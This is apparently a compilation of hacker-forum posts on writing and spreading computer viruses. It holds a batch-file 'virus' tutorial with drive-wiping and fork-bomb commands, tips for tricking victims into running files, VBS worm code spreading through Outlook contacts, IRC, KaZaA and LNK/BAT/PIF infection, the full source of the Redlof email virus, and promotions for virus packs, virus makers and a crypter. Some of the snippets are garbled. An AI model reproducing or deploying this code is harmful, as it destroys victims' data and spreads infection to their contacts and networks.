How to make batch into a notepad

How to build a simple .bat virus

Index
1. Tools
2. What makes a virus a virus
3. Making your first batch file
4. Making a batch virus
5. Destructive commands
6. Most common tricks used to make someone open the file
7.By, Robby23, 24 Guns, Harry, SLAUGHTER, blu3m4n, BuRP QuakE


1. Tools
To make a batch program you will need a text program (ex. Word,notepad,wordpad etc…) A keyboard if you don’t have one you can use the ON-screen keyboard
To get to the on-screen keyboard start>all programs>accessories>accessibility


2. What makes a virus a virus
When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies it self to other cells cause it can’t live with out a host. Same with a computer virus with out a file or a program a virus can’t be made.
So all a computer virus is: a program that copies it self ,but some people put destructive code in it.

3. Making a Batch file
I’m going to use notepad you can use what ever you want

We are also going to make a “Hello World� Application that is the first program you make in any language

When making a batch file you are always going to use this line first

@echo off

You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer.
You can experiment a little if you want.

Now we are going to make it say Hello World

To do this we need a echo command which looks like this
echo

This tells the program to write something since we want it to say Hello World we are going to type Hello World next to echo to make it look like this

echo Hello World

so at this point you should have

@echo off
echo Hello World

now go to file save and name it test.bat ( you can name it whatever you want as long as it has .bat at the end.)
Save it to the desktop so you can get to it faster.

Then run it


You should of have a black box open and close really fast

To fix this we need a pause command and we will also need a goto command

The goto command is the most important command

If you don't know the goto command tell it were to go to next.

since we need a pause command we want it to go to pause so we need to write goto pause like this

goto pause

now u should have

@echo off
echo Hello World
goto pause

now we need a subsection name pause

you make a sub section by putting a : by the first word like this

:start

or

:end

,but we said go to pause so we need one name pause like this

:pause

then under that we are goin to write pause

:pause
pause

this just makes it were it will keep the box open till you press a key

Optional

At the end you can put a exit at the end of pause were the goto command should go ,but you don't have to.

save at run it now.You should be able to read your text now

4. Making a Batch file into a virus

This is a lot easier then some people think.

To make a virus you just need the copy command which looks like this

copy

so lets make a new one by reading section 3 you should know you need the @echo off

@echo off
copy

allright we are going to name this file first

and we are going to make it copy itself to C:\WINDOWS just because no one looks in their

this is what it looks like (i will explain it)

@echo off
copy first C:\WINDOWS

copy-tells it to copy
first-is just the name of the file we want to copy
C:\WINDOWS- is the place you want to copy to

that is a virus

5. Destructive commands

If you get pissed at someone you might want to send him something to mess with him. Here are some commands to add to the virus.

del -this del files

del file name
del (.txt*)

the (.txt*) would delete all txt files on the computer the * at the end just means all instead of a file called .txt

deltree- this deletes the whole folder

you can remember it like this

Think of a tree if you type del you are only deleting a part of the tree ,but if you type deltree you are deleting the whole tree

format- this deletes everything

format c:

this deletes everything in the c drive

open

this is just fun to use to scare some one but not do damage to something

open name of file

like to open notepad type

open notepad

to open microsoft paint type

open mspaint

just put ta crap load in their

also the next one that can be very usefull is looping

this will make the file repeat it self til it is shut off

say your first sub section is called start

you would just make the goto command to go to start like

@echo off
:start
start notepad
goto start

that will open notepad over and over and if they don't close it it can crash their computer

to open the command window you have to use var. like %% (not going to explain var. it would be confusing)

@echo off
:whatever
start %0
goto whatever

this will open the black box over and over

6. Most command tricks

people will put it in a folder with a couple read me doc. and call it a game

people will say check this out it is so cool

people will say check out this hack or cheat i found for this game

to check if the are good do this

tell them to put it in a zip folder and send it

unzip and right click on the program(don't open it)

and press edit

that will show the source code and if you see something you don't like then delete it

Spreading Virus (source code)

1) eMail spreading

First you'll find the eMail-spreading-source:

Dim x on error resume next Set fso ="Scripting.FileSystem.Object" Set so=CreateObject(fso) Set ol=CreateObject("Outlook.Application") Set out= WScript.CreateObject("Outlook.Application") Set mapi = out.GetNameSpace("MAPI") Set a = mapi.AddressLists(1) For x=1 To a.AddressEntries.Count Set Mail=ol.CreateItem(0) Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) Mail.Subject="Subject" Mail.Body="Body" Mail.Attachments.Add Wscript.ScriptFullName Mail.Send Next ol.Quit

The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses. It's really easy, I think.

2) mIRC spreading

The source first:

Dim mirc set fso=CreateObject("Scripting.FileSystemObject") set mirc=fso.CreateTextFile("C:\mirc\script.ini") fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True mirc.WriteLine "[script]" mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs } mirc.Close

First The virus copies itself to C:\mirc\attachment.vbs Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file.

3) pIRCh spreading

Source:

Dim pirch set fso=CreateObject("Scripting.FileSystemObject") set mirc=fso.CreateTextFile("C:pirch98events.ini") fso.CopyFile Wscript.ScriptFullName, "C:mircattachment.vbs", True pirch.WriteLine "[Levels]"); pirch.WriteLine "Enabled=1"); pirch.WriteLine "Count=6"); pirch.WriteLine "Level1=000-Unknows" pirch.WriteLine "000-UnknowsEnabled=1" pirch.WriteLine "Level2=100-Level 100" pirch.WriteLine "100-Level 100Enabled=1" pirch.WriteLine "Level3=200-Level 200" pirch.WriteLine "200-Level 200Enabled=1" pirch.WriteLine "Level4=300-Level 300" pirch.WriteLine "300-Level 300Enabled=1" pirch.WriteLine "Level5=400-Level 400" pirch.WriteLine "400-Level 400Enabled=1" pirch.WriteLine "Level6=500-Level 500" pirch.WriteLine "500-Level 500Enabled=1" pirch.WriteLine "[000-Unknowns]" pirch.WriteLine "User1=*!*@*" pirch.WriteLine "UserCount=1" pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\attachement.vbs" pirch.WriteLine "EventCount=1" pirch.WriteLine "[100-Level 100]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[200-Level 200]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[300-Level 300]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[400-Level 400]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[500-Level 500]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.Close

It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:\pirch98), then changes the event.ini file, so every user get an infect file.

4) vIRC spreading

VBS vIRC source:

set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\Virc\attachment.vbs", True set shell=CreateObject("WScript.Shell") shell RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\attachment.vbs"

It's a really short code. First you need a copy of the virus, than change a registry key. That's all...

5) KaZaA spreading

Source:

set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\Kazaa\Nirvana - You Know You Are Right.vbs", True set shell=CreateObject("WScript.Shell") shell.RegWrite "HKLM\\Software\\KaZaA\\Transfer\\DlDir0", "C:\Kazaa");

You make a copy of the virus in the C:\Kazaa-direction. Then make a registry-key. Every file in the direction (here it is "C:\kazaa\") other user can download. I think, you will understand it.

6) LNK dropping

Dropping means, that every LNK file opens the virus. Look at the code:

Dim shell, msc, batch, fso set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True set shell=wscript.createobject("wscript.shell") set msc=shell.CreateShortCut("C:\vbs.lnk") msc.TargetPath=shell.ExpandEnvironment("C:\vbs.vbs") msc.WindowStyle=4 msc.Save set batch=fso.CreateTextFile("C:\lnk.bat") batch.WriteLine "cls" batch.WriteLine "@echo off" batch.WriteLine "for %%a in (*.lnk ..\*.lnk \*.lnk %path%\*.lnk %tmp%\*.lnk %temp%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%a" batch.Close shell.Run "C:\lnk.bat"

First the virus makes a copy of itself to C:\vbs.vbs Then it generates a LNK file, which opens the C:\vbs.vbs-file. Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.

7) BAT dropping

Source first:

Dim shell, batcha, batchb, fso set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True set batcha=fso.CreateTextFile("C:\bat.bat") batcha.WriteLine "cls" batcha.WriteLine "@echo off" batcha.WriteLine "cscript C:\vbs.vbs" batcha.Close set batchb=CreateTextFile("C:\bata.bat") batchb.WriteLine "cls" batchb.WriteLine "@echo off" batchb.WriteLine "for %%a in (*.bat ..\*.bat \*.bat %path%\*.bat %tmp%\*.bat %temp%\*.bat %windir%\*.bat) do copy C:\bat.bat %%a" batchb.Close shell.Run "C:\lnk.bat"

First the virus copies itself to C:\vbs.vbs. Than it generates a batch-file (C:\bat.bat) which opens the virus-copy. Than te virus generates a second batch file, which copies the first one to every batch-files it can find.

8) PIF dropping

PIF files open DOS-files. Yes, but VBS is a windows file?? what to do?
Source:

Dim shell, msc, batch, fso, batchb set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True set batch=CreateTextFile("C:\bat.bat") batch.WriteLine "cls" batch.WriteLine "@echo off" batch.WriteLine "cscript C:\vbs.vbs" batch.Close set shell=wscript.createobject("wscript.shell") set msc=shell.CreateShortCut("C:\pif.lnk") msc.TargetPath=shell.ExpandEnvironment("C:\bat.bat") msc.WindowStyle=4 msc.Save set batchb=CreaateTextFile("C:\pif.bat") batchb.WriteLine "cls" batchb.WriteLine "@echo off" batchb.WriteLine "for %%a in (*.pif ..\*.pif \*.pif %path%\*.pif %tmp%\*.pif %temp%\*.pif %windir%\*.pif) do copy C:\pif.pif %%a" batchb.Close shell.Run "C:\pif.bat"

First the virus copies itself to C:\vbs.vbs. Than it generates a batch file, which opens the virus. Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK, but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF. Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.
Before starting writing this article, i don't really like to program in VBS, because I thought, it's a ScriptKiddy language. But after a while I liked it more and more, because Im able to make really nice things like file-dropping or other stuff. I hope U also enjoyed reading this tutorial about VisualBasicScript.

Redlof VBS>Redlof (source code)

Redlof is polymorphic virus that embeds itself without any attachment to every e-mail sent from the infected system. It executes when an infected email message is viewed.

NAME: Redlof
ALIAS: VBS.Redlof, VBS/Redlof
ALIAS: VBS/Redolf

VARIANT: Redlof.A
VARIANT: VBS/Redolf.A

VBS/Redlof.A@m executes directly from an infected message by using a security vulnerbility in Internet Exlorer known as Microsoft VM ActiveX Control Vulnerability. More information about the vulnerability and a fix is available from Microsoft: http://www.microsoft.com/technet/security/bulletin/ms00-075.asp

When the virus executes, it infects a file "web\Folders.htt" at the Windows installation directory which causes that the virus activates when any directory is opened using the Active Desktop's web folder feature.

The virus also infects files with extensions "htm", "html", "asp", "php", "jsp", "htt" or "vbs".

Redlof drops the following infected files:

\Program Files\Common Files\Microsoft Shared\Stationery\blank.html
\Windows\System\Kernel32.dll
\Windows\web\kjwall.gif
\Windows\system32\desktop.ini

"blank.html" is used to replace the default stationaries for both Outlook and Outlook Express via registry causing that the every message sent from an infected system will carry the virus.

The "Kernel32.dll" is also set to registry so that it will be executed on the system restart:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32

Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() KJSetDim() KJCreateMilieu() KJLikeIt() KJCreateMail() KJPropagate() End Sub Function KJAppendTo(FilePath,TypeStr) On Error Resume Next Set ReadTemp = FSO.OpenTextFile(FilePath,1) TmpStr = ReadTemp.ReadAll If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then ReadTemp.Close Exit Function End If If TypeStr = "htt" Then ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,2) FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText FileTemp.Close Set FAttrib = FSO.GetFile(FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,8) If TypeStr = "html" Then FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText ElseIf TypeStr = "vbs" Then FileTemp.Write vbCrLf & VbsText End If FileTemp.Close End If End Function Function KJChangeSub(CurrentString,LastIndexChar) If LastIndexChar = 0 Then If Left(LCase(CurrentString),1) =< LCase("c") Then KJChangeSub = FinalyDisk & ":\" SubE = 0 Else KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":" SubE = 0 End If Else KJChangeSub = Mid(CurrentString,1,LastIndexChar) End If End Function Function KJCreateMail() On Error Resume Next If InWhere = "html" Then Exit Function End If ShareFile = Left(WinPath,3) & "Program FilesCommon FilesMicrosoft SharedStationeryblank.htm" If (FSO.FileExists(ShareFile)) Then Call KJAppendTo(ShareFile,"html") Else Set FileTemp = FSO.OpenTextFile(ShareFile,2,true) FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText FileTemp.Close End If DefaultId = WsShell.RegRead("HKEY_CURRENT_USERIdentitiesDefault User ID") OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressMediaVer") WsShell.RegWrite "HKEY_CURRENT_USERIdentities"&DefaultId&"SoftwareMicrosoftOutlook Express"& Left(OutLookVersion,1) &".0MailCompose Use Stationery",1,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USERIdentities"&DefaultId&"SoftwareMicrosoftOutlook Express"& Left(OutLookVersion,1) &".0MailStationery Name",ShareFile) Call KJMailReg("HKEY_CURRENT_USERIdentities"&DefaultId&"SoftwareMicrosoftOutlook Express"& Left(OutLookVersion,1) &".0MailWide Stationery Name",ShareFile) WsShell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0OutlookOptionsMailEditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USERSoftwareMicrosoftWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360","blank") Call KJMailReg("HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360","blank") WsShell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftOffice10.0OutlookOptionsMailEditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USERSoftwareMicrosoftOffice10.0CommonMailSettingsNewStationery","blank") KJummageFolder(Left(WinPath,3) & "Program FilesCommon FilesMicrosoft SharedStationery") End Function Function KJCreateMilieu() On Error Resume Next TempPath = "" If Not(FSO.FileExists(WinPath & "WScript.exe")) Then TempPath = "system32" End If If TempPath = "system32" Then StartUpFile = WinPath & "SYSTEMKernel32.dll" Else StartUpFile = WinPath & "SYSTEMKernel.dll" End If WsShell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunKernel32",StartUpFile FSO.CopyFile WinPath & "webkjwall.gif",WinPath & "webFolder.htt" FSO.CopyFile WinPath & "system32kjwall.gif",WinPath & "system32desktop.ini" Call KJAppendTo(WinPath & "webFolder.htt","htt") WsShell.RegWrite "HKEY_CLASSES_ROOT.dll","dllfile" WsShell.RegWrite "HKEY_CLASSES_ROOT.dllContent Type","application/x-msdownload" WsShell.RegWrite "HKEY_CLASSES_ROOTdllfileDefaultIcon",WsShell.RegRead("HKEY_CLASSES_ROOTvxdfileDefaultIcon") WsShell.RegWrite "HKEY_CLASSES_ROOTdllfileScriptEngine","VBScript" WsShell.RegWrite "HKEY_CLASSES_ROOTdllFileShellOpenCommand",WinPath & TempPath & "WScript.exe ""%1"" %*" WsShell.RegWrite "HKEY_CLASSES_ROOTdllFileShellExPropertySheetHandlersWSHProps","{60254CA5-953B-11CF-8C96-00AA00B8708C}" WsShell.RegWrite "HKEY_CLASSES_ROOTdllFileScriptHostEncode","{85131631-480C-11D2-B1F9-00C04F86C324}" Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true) FileTemp.Write VbsText FileTemp.Close End Function Function KJLikeIt() If InWhere <> "html" Then Exit Function End If ThisLocation = document.location If Left(ThisLocation, 4) = "file" Then ThisLocation = Mid(ThisLocation,9) If FSO.GetExtensionName(ThisLocation) <> "" then ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation))) End If If Len(ThisLocation) > 3 Then ThisLocation = ThisLocation & "" End If KJummageFolder(ThisLocation) End If End Function Function KJMailReg(RegStr,FileName) On Error Resume Next RegTempStr = WsShell.RegRead(RegStr) If RegTempStr = "" Then WsShell.RegWrite RegStr,FileName End If End Function Function KJOboSub(CurrentString) SubE = 0 TestOut = 0 Do While True TestOut = TestOut + 1 If TestOut > 28 Then CurrentString = FinalyDisk & ":" Exit Do End If On Error Resume Next Set ThisFolder = FSO.GetFolder(CurrentString) Set DicSub = CreateObject("Scripting.Dictionary") Set Folders = ThisFolder.SubFolders FolderCount = 0 For Each TempFolder in Folders FolderCount = FolderCount + 1 DicSub.add FolderCount, TempFolder.Name Next If DicSub.Count = 0 Then LastIndexChar = InstrRev(CurrentString,"",Len(CurrentString)-1) SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) SubE = 1 Else If SubE = 0 Then CurrentString = CurrentString & DicSub.Item(1) & "" Exit Do Else j = 0 For j = 1 To FolderCount If LCase(SubString) = LCase(DicSub.Item(j)) Then If j < FolderCount Then CurrentString = CurrentString & DicSub.Item(j+1) & "" Exit Do End If End If Next LastIndexChar = InstrRev(CurrentString,"",Len(CurrentString)-1) SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) End If End If Loop KJOboSub = CurrentString End Function Function KJPropagate() On Error Resume Next RegPathValue = "HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressDegree" DiskDegree = WsShell.RegRead(RegPathValue) If DiskDegree = "" Then DiskDegree = FinalyDisk & ":" End If For i=1 to 5 DiskDegree = KJOboSub(DiskDegree) KJummageFolder(DiskDegree) Next WsShell.RegWrite RegPathValue,DiskDegree End Function Function KJummageFolder(PathName) On Error Resume Next Set FolderName = FSO.GetFolder(PathName) Set ThisFiles = FolderName.Files HttExists = 0 For Each ThisFile In ThisFiles FileExt = UCase(FSO.GetExtensionName(ThisFile.Path)) If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then Call KJAppendTo(ThisFile.Path,"html") ElseIf FileExt = "VBS" Then Call KJAppendTo(ThisFile.Path,"vbs") ElseIf FileExt = "HTT" Then HttExists = 1 End If Next If (UCase(PathName) = UCase(WinPath & "Desktop")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then HttExists = 1 End If If HttExists = 0 Then FSO.CopyFile WinPath & "system32desktop.ini",PathName FSO.CopyFile WinPath & "webFolder.htt",PathName End If End Function Function KJSetDim() On Error Resume Next Err.Clear TestIt = WScript.ScriptFullname If Err Then InWhere = "html" Else InWhere = "vbs" End If If InWhere = "vbs" Then Set FSO = CreateObject("Scripting.FileSystemObject") Set WsShell = CreateObject("WScript.Shell") Else Set AppleObject = document.applets("KJ_guest") AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppleObject.createInstance() Set WsShell = AppleObject.GetObject() AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") AppleObject.createInstance() Set FSO = AppleObject.GetObject() End If Set DiskObject = FSO.Drives For Each DiskTemp In DiskObject If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then Exit For End If FinalyDisk = DiskTemp.DriveLetter Next Dim OtherArr(3) Randomize For i=0 To 3 OtherArr(i) = Int((9 * Rnd)) Next TempString = "" For i=1 To Len(ThisText) TempNum = Asc(Mid(ThisText,i,1)) If TempNum = 13 Then TempNum = 28 ElseIf TempNum = 10 Then TempNum = 29 End If TempChar = Chr(TempNum - OtherArr(i Mod 4)) If TempChar = Chr(34) Then TempChar = Chr(18) End If TempString = TempString & TempChar Next UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ThisText = "ExeString = """ & TempString & """" HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()" WinPath = FSO.GetSpecialFolder(0) & "" If (FSO.FileExists(WinPath & "webFolder.htt")) Then FSO.CopyFile WinPath & "webFolder.htt",WinPath & "webkjwall.gif" End If If (FSO.FileExists(WinPath & "system32desktop.ini")) Then FSO.CopyFile WinPath & "system32desktop.ini",WinPath & "system32kjwall.gif" End If End Function

ST Close Window Virus By Knight

i ! this is a superp virus ! when victim open it , virus close all windows on that system !!! and ever time that victim open a window virus speedly close it ! only victim can see Wallpaper !!!!!!!!!! Shocked Shocked

ST CloseWindow

Detail :
5 Server Emersion ! :.EXE - .Pif - .Com - .Cmd - .Bat
5 Icon !
and 2 model ! Funny , Dangerous

funny : run virus on the victim system , but this is for fun ! because viruse will be cleaned after a restart ! you can test it ! this is no risk ! it is fun Wink Tongue

Dangerous : this is main virus !
my virus make autorun at all drives ! a Great autorun !
Double Click = Run Virus
Right Click -> Open = Run Virus
Right Click -> Explore = Run Virus
it is Great , Yes ?!!! Grin Cool

this virus is very powerfull ! ( Very Very powefull )
no one can,t disable it !!!!

My Virus Disable all thing of Safe Mode ! Example : CMD - TaskMgr - Run ... System Restore !!!!

this a little comment about this virus ! etc ...

Program Face :

By Knight (KILL-SYSTEM32 coder)

Download Program and ActiveX File :
Good Luck My Friends !

Regard To IRAN
Regard To ST Group
Regard To Persians
Regard To Great Cyros

Dangerous Viruses

Dont be Stupid.. this is a Virus Pack Dont open on your own computer LOL!

W32.Bagle.AF
W32.Bagle.H
W32.Hiton.A
W32.MyDoom.F
W32.Netsky.Z
W32.Netsky.D
W32.Netsky.B
W32.Sober.F
W32.Sober.D
W32.Sober.C
W32.Sober
W32.Dumaru
W32.Sobig.F
W32.BugBear.B
W32.LovSan/Blaster1
W32.Sinapps
W32.Sunday
W32.Delta
W32.Gold
W32.Retro
W32.Koshi.1.9
Linux.ADM
Linux.Coco
W32.NBC
W32.Clickit
W32.Parasit
W32.PolySnakebyte
W32.RousSarcoma
W32.Hllw.Sydney@MM
CIH
I Love You
Melissa
w32nimda
Wagner 782
Casino
Harddrive-killer pro 5
Code red 1
Code red 2
Pokemon Pikachu
AIDS
hdfill
Blackday
Bulbasaur
Mirc.El_Che_is_alive
Kpmv.W2000.Poly
Mbop!
C-worm
Batschell
bat.antifa
Bat/BatXP.Iaafe
Bat\\bun
Bat.Bush
BAT.Dolomite.worm
bat.****
bat/hotcakes
bat.ina
bat.junkboat
bat.soulcontrol
BatXP.Saturn
BAT/Calvin&Hobbes
claytron
HoloCaust
p2p.Opax
PERL.Nirvana
VBS/Artillery
vbs.eva
VBS/Evade
Vbs.Evion
w32.merkur.c
W32/Outsider
W32/Outsider B
W32/Outsider C
W32/Outsider D
W32/Outsider E
W32/Perrun
W97/Blackout
W97M/Authority
W97M/Chester
W97M/SFC
WinREG.Sptohell
Virenpaket 0
Virenpaket 1
Virenpaket 2
Virenpaket 3
Virenpaket 4
Virenpaket 5
Virenpaket 6
Virenpaket 7
Virenpaket 8
Virenpaket 9
Virenpaket 10
Virenpaket 11
Zed\'s Word Macro Virus Constructor
Windows Scripting Host Worm Constructor 1.0
Special Format Generator 2.0

ST Win Destroyer Golden version

Very nice Virus maker . will destroy victim windows even though victim have deep freeze in His drive ( c ) and he restart the virus still working coz it work in system volume information of all hard disk . enjoy

WARNING: DON'T RUN THIS INTO YOUR PC IF YOU DON'T WANT TO RE-FORMAT YOUR PC BACK

Virus Maker Professional 2008

Virus Maker Professional 2008


Scanned By Kaspersky Internet Security 325, Nothing Found

Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware

All Info inside rar






Pass : LoloUOwnRisk

Virus Maker Professional 2008

Virus Maker Professional 2008


Scanned By Kaspersky Internet Security 325, Nothing Found

Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware

All Info inside rar






Pass : LoloUOwnRisk

Poison Crypter v1.0

Download on your own risk

the server is already been detected


but the prog is still clean

Virus.Maker.Professional.2008

Virus Maker Professional 2008

password : www.cw-network.info

Demon PS 2.7 + all